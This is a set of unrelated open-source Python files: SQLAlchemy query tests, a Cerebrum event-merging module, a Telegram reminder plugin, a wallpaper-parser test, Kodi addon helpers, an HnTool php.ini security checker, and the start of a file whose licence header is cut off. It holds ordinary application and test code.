        s2 = select([table]).where(table.c.id == 3).distinct()

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.parens_in_union_contained_select_w_limit_offset
    def test_limit_offset_in_unions_from_alias(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
        )

        # this necessarily has double parens
        u1 = union(s1, s2).alias()
        self._assert_result(
            u1.select().limit(2).order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)]
        )

    def test_limit_offset_aliased_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
            .alias()
            .select()
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
            .alias()
            .select()
        )

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])


class ExpandingBoundInTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
            Column("z", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2, "z": "z1"},
                {"id": 2, "x": 2, "y": 3, "z": "z2"},
                {"id": 3, "x": 3, "y": 4, "z": "z3"},
                {"id": 4, "x": 4, "y": 5, "z": "z4"},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_multiple_empty_sets(self):
        # test that any anonymous aliasing used by the dialect
        # is fine with duplicates
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .where(table.c.y.in_(bindparam("p", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": [], "p": []})

    @testing.requires.tuple_in
    def test_empty_heterogeneous_tuples(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.z).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    @testing.requires.tuple_in
    def test_empty_homogeneous_tuples(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.y).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_bound_in_scalar(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(2,), (3,), (4,)], params={"q": [2, 3, 4]})

    @testing.requires.tuple_in
    def test_bound_in_two_tuple(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.y).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(
            stmt, [(2,), (3,), (4,)], params={"q": [(2, 3), (3, 4), (4, 5)]}
        )

    @testing.requires.tuple_in
    def test_bound_in_heterogeneous_two_tuple(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(
                tuple_(table.c.x, table.c.z).in_(
                    bindparam("q", expanding=True)
                )
            )
            .order_by(table.c.id)
        )

        self._assert_result(
            stmt,
            [(2,), (3,), (4,)],
            params={"q": [(2, "z2"), (3, "z3"), (4, "z4")]},
        )

    def test_empty_set_against_integer(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_empty_set_against_integer_negation(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.x.notin_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(1,), (2,), (3,), (4,)], params={"q": []})

    def test_empty_set_against_string(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.z.in_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [], params={"q": []})

    def test_empty_set_against_string_negation(self):
        table = self.tables.some_table

        stmt = (
            select([table.c.id])
            .where(table.c.z.notin_(bindparam("q", expanding=True)))
            .order_by(table.c.id)
        )

        self._assert_result(stmt, [(1,), (2,), (3,), (4,)], params={"q": []})

    def test_null_in_empty_set_is_false(self):
        stmt = select(
            [
                case(
                    [
                        (
                            null().in_(
                                bindparam("foo", value=(), expanding=True)
                            ),
                            true(),
                        )
                    ],
                    else_=false(),
                )
            ]
        )
        in_(config.db.execute(stmt).fetchone()[0], (False, 0))


class LikeFunctionsTest(fixtures.TablesTest):
    __backend__ = True

    run_inserts = "once"
    run_deletes = None

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "data": "abcdefg"},
                {"id": 2, "data": "ab/cdefg"},
                {"id": 3, "data": "ab%cdefg"},
                {"id": 4, "data": "ab_cdefg"},
                {"id": 5, "data": "abcde/fg"},
                {"id": 6, "data": "abcde%fg"},
                {"id": 7, "data": "ab#cdefg"},
                {"id": 8, "data": "ab9cdefg"},
                {"id": 9, "data": "abcde#fg"},
                {"id": 10, "data": "abcd9fg"},
            ],
        )

    def _test(self, expr, expected):
        some_table = self.tables.some_table

        with config.db.connect() as conn:
            rows = {
                value
                for value, in conn.execute(
                    select([some_table.c.id]).where(expr)
                )
            }

        eq_(rows, expected)

    def test_startswith_unescaped(self):
        col = self.tables.some_table.c.data
        self._test(col.startswith("ab%c"), {1, 2, 3, 4, 5, 6, 7, 8, 9, 10})

    def test_startswith_autoescape(self):
        col = self.tables.some_table.c.data
        self._test(col.startswith("ab%c", autoescape=True), {3})

    def test_startswith_sqlexpr(self):
        col = self.tables.some_table.c.data
        self._test(
            col.startswith(literal_column("'ab%c'")),
            {1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
        )

    def test_startswith_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.startswith("ab##c", escape="#"), {7})

    def test_startswith_autoescape_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.startswith("ab%c", autoescape=True, escape="#"), {3})
        self._test(col.startswith("ab#c", autoescape=True, escape="#"), {7})

    def test_endswith_unescaped(self):
        col = self.tables.some_table.c.data
        self._test(col.endswith("e%fg"), {1, 2, 3, 4, 5, 6, 7, 8, 9})

    def test_endswith_sqlexpr(self):
        col = self.tables.some_table.c.data
        self._test(
            col.endswith(literal_column("'e%fg'")), {1, 2, 3, 4, 5, 6, 7, 8, 9}
        )

    def test_endswith_autoescape(self):
        col = self.tables.some_table.c.data
        self._test(col.endswith("e%fg", autoescape=True), {6})

    def test_endswith_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.endswith("e##fg", escape="#"), {9})

    def test_endswith_autoescape_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.endswith("e%fg", autoescape=True, escape="#"), {6})
        self._test(col.endswith("e#fg", autoescape=True, escape="#"), {9})

    def test_contains_unescaped(self):
        col = self.tables.some_table.c.data
        self._test(col.contains("b%cde"), {1, 2, 3, 4, 5, 6, 7, 8, 9})

    def test_contains_autoescape(self):
        col = self.tables.some_table.c.data
        self._test(col.contains("b%cde", autoescape=True), {3})

    def test_contains_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.contains("b##cde", escape="#"), {7})

    def test_contains_autoescape_escape(self):
        col = self.tables.some_table.c.data
        self._test(col.contains("b%cd", autoescape=True, escape="#"), {3})
        self._test(col.contains("b#cd", autoescape=True, escape="#"), {7})


class ComputedColumnTest(fixtures.TablesTest):
    __backend__ = True
    __requires__ = ("computed_columns",)

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "square",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("side", Integer),
            Column("area", Integer, Computed("side * side")),
            Column("perimeter", Integer, Computed("4 * side")),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.square.insert(),
            [{"id": 1, "side": 10}, {"id": 10, "side": 42}],
        )

    def test_select_all(self):
        with config.db.connect() as conn:
            res = conn.execute(
                select([text("*")])
                .select_from(self.tables.square)
                .order_by(self.tables.square.c.id)
            ).fetchall()
            eq_(res, [(1, 10, 100, 40), (10, 42, 1764, 168)])

    def test_select_columns(self):
        with config.db.connect() as conn:
            res = conn.execute(
                select(
                    [self.tables.square.c.area, self.tables.square.c.perimeter]
                )
                .select_from(self.tables.square)
                .order_by(self.tables.square.c.id)
            ).fetchall()
            eq_(res, [(100, 40), (1764, 168)])


class ExistsTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "stuff",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.stuff.insert(),
            [
                {"id": 1, "data": "some data"},
                {"id": 2, "data": "some data"},
                {"id": 3, "data": "some data"},
                {"id": 4, "data": "some other data"},
            ],
        )

    def test_select_exists(self, connection):
        stuff = self.tables.stuff
        eq_(
            connection.execute(
                select([literal(1)]).where(
                    exists().where(stuff.c.data == "some data")
                )
            ).fetchall(),
            [(1,)],
        )

    def test_select_exists_false(self, connection):
        stuff = self.tables.stuff
        eq_(
            connection.execute(
                select([literal(1)]).where(
                    exists().where(stuff.c.data == "no data")
                )
            ).fetchall(),
            [],
        )


class IsOrIsNotDistinctFromTest(fixtures.TablesTest):
    __backend__ = True
    __requires__ = ("supports_is_distinct_from",)

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "is_distinct_test",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("col_a", Integer, nullable=True),
            Column("col_b", Integer, nullable=True),
        )

    @testing.combinations(
        ("both_int_different", 0, 1, 1),
        ("both_int_same", 1, 1, 0),
        ("one_null_first", None, 1, 1),
        ("one_null_second", 0, None, 1),
        ("both_null", None, None, 0),
        id_="iaaa",
        argnames="col_a_value, col_b_value, expected_row_count_for_is",
    )
    def test_is_or_isnot_distinct_from(
        self, col_a_value, col_b_value, expected_row_count_for_is, connection
    ):
        tbl = self.tables.is_distinct_test

        connection.execute(
            tbl.insert(),
            [{"id": 1, "col_a": col_a_value, "col_b": col_b_value}],
        )

        result = connection.execute(
            tbl.select(tbl.c.col_a.is_distinct_from(tbl.c.col_b))
        ).fetchall()
        eq_(
            len(result),
            expected_row_count_for_is,
        )

        expected_row_count_for_isnot = (
            1 if expected_row_count_for_is == 0 else 0
        )
        result = connection.execute(
            tbl.select(tbl.c.col_a.isnot_distinct_from(tbl.c.col_b))
        ).fetchall()
        eq_(
            len(result),
            expected_row_count_for_isnot,
        )

# encoding: utf-8
#
# Copyright 2017 University of Oslo, Norway
#
# This file is part of Cerebrum.
#
# Cerebrum is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Cerebrum is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Cerebrum; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
""" An abstract event that can be stored in the database. """
from __future__ import absolute_import

import datetime
import itertools
import mx.DateTime
import pytz

import cereconf


class _VerbSingleton(type):
    """ A metaclass that makes each EventType verb a singleton. """

    verbs = {}

    def __call__(cls, verb, *args):
        if verb not in cls.verbs:
            cls.verbs[verb] = super(_VerbSingleton, cls).__call__(verb, *args)
        return cls.verbs[verb]

    def get_verb(cls, verb):
        return cls.verbs.get(verb)


class EventType(_VerbSingleton('EventTypeSingleton', (object,), {})):
    """Holds an event type."""

    __slots__ = ['verb', 'description', ]

    def __init__(self, verb, description):
        """ Initialize EventType.

        :verb: Scim verb
        :description: HR description text
        """
        self.verb = verb
        self.description = description

    def __repr__(self):
        return '<{0.__class__.__name__!s} {0.verb}>'.format(self)

    def __eq__(self, other):
        """Equality."""
        return isinstance(other, EventType) and other.verb == self.verb

    def __hash__(self):
        """Hash."""
        return hash(self.verb)


# Define event types:

ADD = EventType('add', 'Add an object to subject')
CREATE = EventType('create', 'Create a new subject')
ACTIVATE = EventType('activate', 'Subject has no longer quarantines in system')
MODIFY = EventType('modify', 'Attributes has changed')
DEACTIVATE = EventType('deactivate', 'Quarantine is activated')
DELETE = EventType('delete', 'Subject is deleted')
REMOVE = EventType('remove', 'Remove an object from subject')
PASSWORD = EventType('password', 'Subject has changed password')
JOIN = EventType('join', 'Join two objects')


class EntityRef(object):
    """ Representation of a single entity.

    The entity_id can be used internally to identify which object we reference

    The entity_type and ident is used to generate a reference to the object
    that other systems can use.
    """

    __slots__ = ['ident', 'entity_type', 'entity_id', ]

    def __init__(self, entity_id, entity_type, ident):
        self.entity_id = int(entity_id)
        self.entity_type = entity_type
        self.ident = ident

    def __repr__(self):
        return ("<{0.__class__.__name__}"
                " id={0.entity_id!r}"
                " type={0.entity_type!r}"
                " ident={0.ident!r}>").format(self)

    def __eq__(self, other):
        return (isinstance(other, EntityRef) and
                self.entity_id == other.entity_id)

    def to_dict(self):
        return {
            'ident': self.ident,
            'entity_id': self.entity_id,
            'entity_type': self.entity_type, }


class DateTimeDescriptor(object):
    """ Datetime descriptor that handles timezones.

    When setting the datetime, this method will try to localize it with the
    default_timezone in the following ways:

    - mx.DateTime.DateTimeType: Naive datetime, assume in default_timezone
    - datetime.datetime: Assume in default_timezone if naive
    - integer: Assume timestamp in UTC

    The returned object will always be a localized datetime.datetime

    """

    default_timezone = pytz.timezone(cereconf.TIMEZONE)

    def __init__(self, slot):
        """ Creates a new datetime descriptor.

        :param str slot:
            The attribute name where the actual value is stored.
        """
        self.slot = slot

    def __repr__(self):
        return '{0.__class__.__name__}({0.slot!r})'.format(self)

    def __get__(self, obj, cls=None):
        if not obj:
            return self
        return getattr(obj, self.slot, None)

    def __set__(self, obj, value):
        if value is None:
            self.__delete__(obj)
            return

        if isinstance(value, (int, long, )):
            # UTC timestamp
            value = pytz.utc.localize(
                datetime.datetime.fromtimestamp(value))
        elif isinstance(value, mx.DateTime.DateTimeType):
            # Naive datetime in default_timezone
            value = self.default_timezone.localize(value.pydatetime())
        elif isinstance(value, datetime.datetime):
            if value.tzinfo is None:
                value = self.default_timezone.localize(value)
        else:
            raise TypeError('Invalid datetime {0} ({1})'.format(type(value),
                                                                repr(value)))

        setattr(obj, self.slot, value)

    def __delete__(self, obj):
        if hasattr(obj, self.slot):
            delattr(obj, self.slot)


class Event(object):
    """ Event abstraction.

    Contains all the neccessary data to serialize an event.
    """

    DEFAULT_TIMEZONE = 'Europe/Oslo'

    __slots__ = ['event_type', 'subject', 'objects', 'context', 'attributes',
                 '_timestamp', '_scheduled', ]

    timestamp = DateTimeDescriptor('_timestamp')
    scheduled = DateTimeDescriptor('_scheduled')

    def __init__(self, event_type,
                 subject=None,
                 objects=None,
                 context=None,
                 attributes=None,
                 timestamp=None,
                 scheduled=None):
        """
        :param EventType event: the type of event
        :param EntityRef subject: reference to the affected entity
        :param list objects: sequence of other affected objects (EntityRef)
        :param list context: sequence of affected systems (str)
        :param list attributes: sequence of affected attributes (str)
        :param datetime timestamp: when the event originated
        :param datetime schedule: when the event should be issued
        """
        self.event_type = event_type
        self.subject = subject
        self.timestamp = timestamp
        self.scheduled = scheduled
        self.objects = set(objects or [])
        self.context = set(context or [])
        self.attributes = set(attributes or [])

    def __repr__(self):
        return ('<{0.__class__.__name__}'
                ' event={0.event_type!r}'
                ' subject={0.subject!r}>').format(self)

    def mergeable(self, other):
        """Can this event be merged with other."""

        if self.scheduled is not None:
            return False
        if self.subject != other.subject:
            return False
        if self.event_type == CREATE:
            return other.event_type not in (DEACTIVATE, REMOVE)
        if self.event_type == DELETE:
            return other.event_type in (REMOVE, DEACTIVATE, ADD, ACTIVATE,
                                        MODIFY, PASSWORD)
        if (self.event_type == other.event_type and
                self.event_type in (ADD, REMOVE, ACTIVATE, DEACTIVATE)):
            return True
        if self.context != other.context:
            return False
        return True

    def merge(self, other):
        """Merge messages."""
        def ret_self():
            self.objects.update(other.objects)
            return [self]

        if not self.mergeable(other):
            return [self, other]
        if self.event_type == CREATE:
            if other.event_type == DELETE:
                return []
            if other.event_type == ADD:
                self.context.update(other.context)
                return ret_self()
            if other.event_type == ACTIVATE:
                return ret_self()  # TODO: if quarantine is an attr, delete it
            if other.event_type == MODIFY:
                self.attributes.update(other.attributes)
                return ret_self()
            if other.event_type == PASSWORD:
                self.attributes.add('password')
                return ret_self()
        elif self.event_type == DELETE:
            return ret_self()
        elif other.event_type == DELETE:
            return [other]
        elif (ACTIVATE == self.event_type and
              DEACTIVATE == other.event_type and
              self.context == other.context):
            return []
        elif (ADD == self.event_type and
              REMOVE == other.event_type and
              self.context == other.context):
            return []
        elif self.event_type == other.event_type:
            if self.event_type in (ADD, REMOVE, ACTIVATE, DEACTIVATE):
                self.context.update(other.context)
                return ret_self()
            if self.context != other.context:
                return [self, other]
            self.attributes.update(other.attributes)
            return ret_self()
        return [self, other]


def merge_events(events):
    """Merge events with similarities.

    As long as subject is the same:
    * create + add/activate/modify/password = create with attributes merged
    * create + deactivate/remove is untouched
    * create + delete should be removed

    * delete + remove/deactivate/add/activate/modify/password = delete

    * x + x = x
    * activate + deactivate = noop (careful with aud)

    Sort into canonical order:
    #. create
    #. delete
    #. add
    #. activate
    #. modify
    #. password
    #. deactivate
    #. remove
    """
    order = (CREATE, DELETE, ADD, ACTIVATE, MODIFY, PASSWORD, DEACTIVATE,
             REMOVE, JOIN)
    ps = [[] for x in order]

    for pl in events:
        pltype = pl.event_type
        idx = order.index(pltype)
        ps[idx].append(pl)

    result = {}
    for idx, tp, pl in zip(range(len(order)), order, ps):
        for p in pl:
            if p.subject not in result:
                result[p.subject] = [p]
            else:
                result[p.subject].append(p)

    def merge_list(finished, merged, current, rest):
        while rest or merged:
            if rest:
                new = current.merge(rest[0])
                if not new:
                    rest.pop(0)
                    merged.extend(rest)
                    rest = merged
                    if not rest:
                        return finished
                    merged = []
                    current = rest.pop(0)
                elif len(new) == 1:
                    if new[0] is not current:
                        merged.extend(rest)
                        rest = merged
                        current = rest.pop(0)
                        merged = []
                    else:
                        rest.pop(0)
                else:
                    merged.append(rest.pop(0))
            else:  # merged is not empty
                finished.append(current)
                rest = merged
                merged = []
                current = rest.pop(0)
        finished.append(current)
        return finished

    for sub, lst in result.items():
        result[sub] = merge_list([], [], lst[0], lst[1:])
    return list(itertools.chain(*result.values()))

# -*- coding: utf-8 -*-
from utils import *

commands = [
    '^remindme',
    '^reminder',
    '^remind$',
    '^r '
]

parameters = (
    ('delay', True),
    ('message', True),
)

description = 'Set a reminder for yourself. First argument is delay until you wish to be reminded.\nExample: `' + config['command_start'] + 'remindme 2h GiT GuD`'
action = 'typing'
hidden = True

reminders = load_json('data/reminders.json')

def to_seconds(time, unit):
    if unit == 's':
        return float(time)
    elif unit == 'm':
        return float(time) * 60
    elif unit == 'h':
        return float(time) * 60 * 60
    elif unit == 'd':
        return float(time) * 60 * 60 * 24

def run(msg):
    input = get_input(msg['text'])

    if not input:
        doc = get_doc(commands, parameters, description)
        return send_message(msg['chat']['id'], doc,
                            parse_mode="Markdown")
    delay = first_word(input)
    if delay:
        time = delay[:-1]
        unit = delay[-1:]
        if not is_int(time) or is_int(unit):
            message = 'The delay must be in this format: `(integer)(s|m|h|d)`.\nExample: `2h` for 2 hours.'
            return send_message(msg['chat']['id'], message, parse_mode="Markdown")
    try:
        alarm = now() + to_seconds(time, unit)
    except:
        return send_message(msg['chat']['id'], message, parse_mode="Markdown")
        
    text = all_but_first_word(input)
    if not text:
        send_message(msg['chat']['id'], 'Please include a reminder.')
        
    if 'username' in msg['from']:
        text += '\n@' + msg['from']['username']
    
    reminder = OrderedDict()
    reminder['alarm'] = alarm
    reminder['chat_id'] = msg['chat']['id']
    reminder['text'] = text
    
    reminders[int(now())] = reminder
    save_json('data/reminders.json', reminders)
    
    if unit == 's':
        delay = delay.replace('s', ' seconds')
    if unit == 'm':
        delay = delay.replace('m', ' minutes')
    if unit == 'h':
        delay = delay.replace('h', ' hours')
    if unit == 'd':
        delay = delay.replace('d', ' days')
    
    message = 'Your reminder has been set for *' + delay + '* from now:\n\n' + text
    send_message(msg['chat']['id'], message, parse_mode="Markdown")

def cron():
    reminders = load_json('data/reminders.json', True)
    for id, reminder in reminders.items():
        if now() > reminder['alarm']:
            send_message(reminder['chat_id'], reminder['text'])
            del reminders[id]
            save_json('data/reminders.json', reminders)

#
# Walldo - A wallpaper downloader
# Copyright (C) 2012  Fernando Castillo 
# 
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

import unittest 
from walldo.parser import Parser;

class ParserTestCase(unittest.TestCase):
    lines = ['<select class="select" style="margin: 0 2px 0 0; margin-top: 4px; float: left; width: 145px; max-width: 145px;" name="resolution" onChange="javascript:imgload(\'ithilien\', this,\'2949\')">']
    expected = ['/wallpaper/7yz4ma1/2949_ithilien_1024x768.jpg']

    def setUp(self):
        self.parser = Parser()

    def testParse(self):
        current = self.parser.parse(self.lines, '1024x768')
        for i in range(len(current)):
            self.assertEquals(self.expected[i], current[i], 'Entry incorrect')

"""
    SALTS XBMC Addon
    Copyright (C) 2015 tknorris

    This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
import xbmcaddon
import xbmcplugin
import xbmcgui
import xbmc
import xbmcvfs
import urllib
import urlparse
import sys
import os
import re

addon = xbmcaddon.Addon()
get_setting = addon.getSetting
show_settings = addon.openSettings

def get_path():
    return addon.getAddonInfo('path').decode('utf-8')

def get_profile():
    return addon.getAddonInfo('profile').decode('utf-8')

def translate_path(path):
    return xbmc.translatePath(path).decode('utf-8')

def set_setting(id, value):
    if not isinstance(value, basestring): value = str(value)
    addon.setSetting(id, value)

def get_version():
    return addon.getAddonInfo('version')

def get_id():
    return addon.getAddonInfo('id')

def get_name():
    return addon.getAddonInfo('name')

def get_plugin_url(queries):
    try:
        query = urllib.urlencode(queries)
    except UnicodeEncodeError:
        for k in queries:
            if isinstance(queries[k], unicode):
                queries[k] = queries[k].encode('utf-8')
        query = urllib.urlencode(queries)

    return sys.argv[0] + '?' + query

def end_of_directory(cache_to_disc=True):
    xbmcplugin.endOfDirectory(int(sys.argv[1]), cacheToDisc=cache_to_disc)

def set_content(content):
    xbmcplugin.setContent(int(sys.argv[1]), content)
    
def create_item(queries, label, thumb='', fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
    list_item = xbmcgui.ListItem(label, iconImage=thumb, thumbnailImage=thumb)
    add_item(queries, list_item, fanart, is_folder, is_playable, total_items, menu_items, replace_menu)

def add_item(queries, list_item, fanart='', is_folder=None, is_playable=None, total_items=0, menu_items=None, replace_menu=False):
    if menu_items is None: menu_items = []
    if is_folder is None:
        is_folder = False if is_playable else True

    if is_playable is None:
        playable = 'false' if is_folder else 'true'
    else:
        playable = 'true' if is_playable else 'false'

    liz_url = get_plugin_url(queries)
    if fanart: list_item.setProperty('fanart_image', fanart)
    list_item.setInfo('video', {'title': list_item.getLabel()})
    list_item.setProperty('isPlayable', playable)
    list_item.addContextMenuItems(menu_items, replaceItems=replace_menu)
    xbmcplugin.addDirectoryItem(int(sys.argv[1]), liz_url, list_item, isFolder=is_folder, totalItems=total_items)

def parse_query(query):
    q = {'mode': 'main'}
    if query.startswith('?'): query = query[1:]
    queries = urlparse.parse_qs(query)
    for key in queries:
        if len(queries[key]) == 1:
            q[key] = queries[key][0]
        else:
            q[key] = queries[key]
    return q

def notify(header=None, msg='', duration=2000, sound=None):
    if header is None: header = get_name()
    if sound is None: sound = get_setting('mute_notifications') == 'false'
    icon_path = os.path.join(get_path(), 'icon.png')
    try:
        xbmcgui.Dialog().notification(header, msg, icon_path, duration, sound)
    except:
        builtin = "XBMC.Notification(%s,%s, %s, %s)" % (header, msg, duration, icon_path)
        xbmc.executebuiltin(builtin)
    
def get_current_view():
    skinPath = translate_path('special://skin/')
    xml = os.path.join(skinPath, 'addon.xml')
    f = xbmcvfs.File(xml)
    read = f.read()
    f.close()
    try: src = re.search('defaultresolution="([^"]+)', read, re.DOTALL).group(1)
    except: src = re.search('<res.+?folder="([^"]+)', read, re.DOTALL).group(1)
    src = os.path.join(skinPath, src, 'MyVideoNav.xml')
    f = xbmcvfs.File(src)
    read = f.read()
    f.close()
    match = re.search('<views>([^<]+)', read, re.DOTALL)
    if match:
        views = match.group(1)
        for view in views.split(','):
            if xbmc.getInfoLabel('Control.GetLabel(%s)' % (view)): return view

# -*- coding: utf-8 -*-
#
# HnTool rules - php
# Copyright (C) 2009-2010 Candido Vieira <cvieira.br@gmail.com>
#
#   This program is free software; you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation; either version 2 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   You should have received a copy of the GNU General Public License
#   along with this program; if not, write to the Free Software
#   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#

import os
import ConfigParser
import HnTool.modules.util
from HnTool.modules.rule import Rule as MasterRule

class Rule(MasterRule):
    def __init__(self, options):
        MasterRule.__init__(self, options)
        self.short_name="php"
        self.long_name="Checks security problems on php config file"
        self.type="config"
        self.required_files = ['/etc/php5/apache2/php.ini', '/etc/php5/cli/php.ini', '/etc/php.ini']

    def requires(self):
        return self.required_files

    def analyze(self, options):
        check_results = self.check_results
        conf_files = self.required_files

        for php_conf in conf_files:
            if os.path.isfile(php_conf):

                config = ConfigParser.ConfigParser()

                try:
                    config.read(php_conf)
                except ConfigParser.ParsingError, (errno, strerror):
                    check_results['info'].append('Could not parse %s: %s' % (php_conf, strerror))
                    continue

                if not config.has_section('PHP'):
                    check_results['info'].append('%s is not a PHP config file' % (php_conf))
                    continue

                if config.has_option('PHP', 'register_globals'):
                    rg = config.get('PHP', 'register_globals').lower()
                    if rg == 'on':
                        check_results['medium'].append('Register globals is on (%s)' % (php_conf))
                    elif rg == 'off':
                        check_results['ok'].append('Register globals is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for register globals (%s)' % (php_conf))
                else:
                    check_results['info'].append('Register globals not found (%s)' % (php_conf))

                if config.has_option('PHP', 'safe_mode'):
                    sm = config.get('PHP', 'safe_mode').lower()
                    if sm == 'on':
                        check_results['low'].append('Safe mode is on (fake security) (%s)' % (php_conf))
                    elif sm == 'off':
                        check_results['info'].append('Safe mode is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for safe mode (%s)' % (php_conf))
                else:
                    check_results['info'].append('Safe mode not found (%s)' % (php_conf))

                if config.has_option('PHP', 'display_errors'):
                    de = config.get('PHP', 'display_errors').lower()
                    if de == 'on':
                        check_results['medium'].append('Display errors is on (stdout) (%s)' % (php_conf))
                    elif de == 'off':
                        check_results['ok'].append('Display errors is off (%s)' % (php_conf))
                    elif de == 'stderr':
                        check_results['info'].append('Display errors set to stderr (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for display errors (%s)' % (php_conf))
                else:
                    check_results['info'].append('Display errors not found (%s)' % (php_conf))

                if config.has_option('PHP', 'expose_php'):
                    ep = config.get('PHP', 'expose_php').lower()
                    if ep == 'on':
                        check_results['low'].append('Expose PHP is on (%s)' % (php_conf))
                    elif ep == 'off':
                        check_results['ok'].append('Expose PHP is off (%s)' % (php_conf))
                    else:
                        check_results['info'].append('Unknown value for expose PHP (%s)' % (php_conf))
                else:
                    check_results['info'].append('Expose PHP not found (%s)' % (php_conf))

        return check_results

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#       progreso.py
#
#       Copyright 2010 Jesús Hómez <jesus@jesus-laptop>
#
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#
#       You should have received a copy of the GNU General Public License
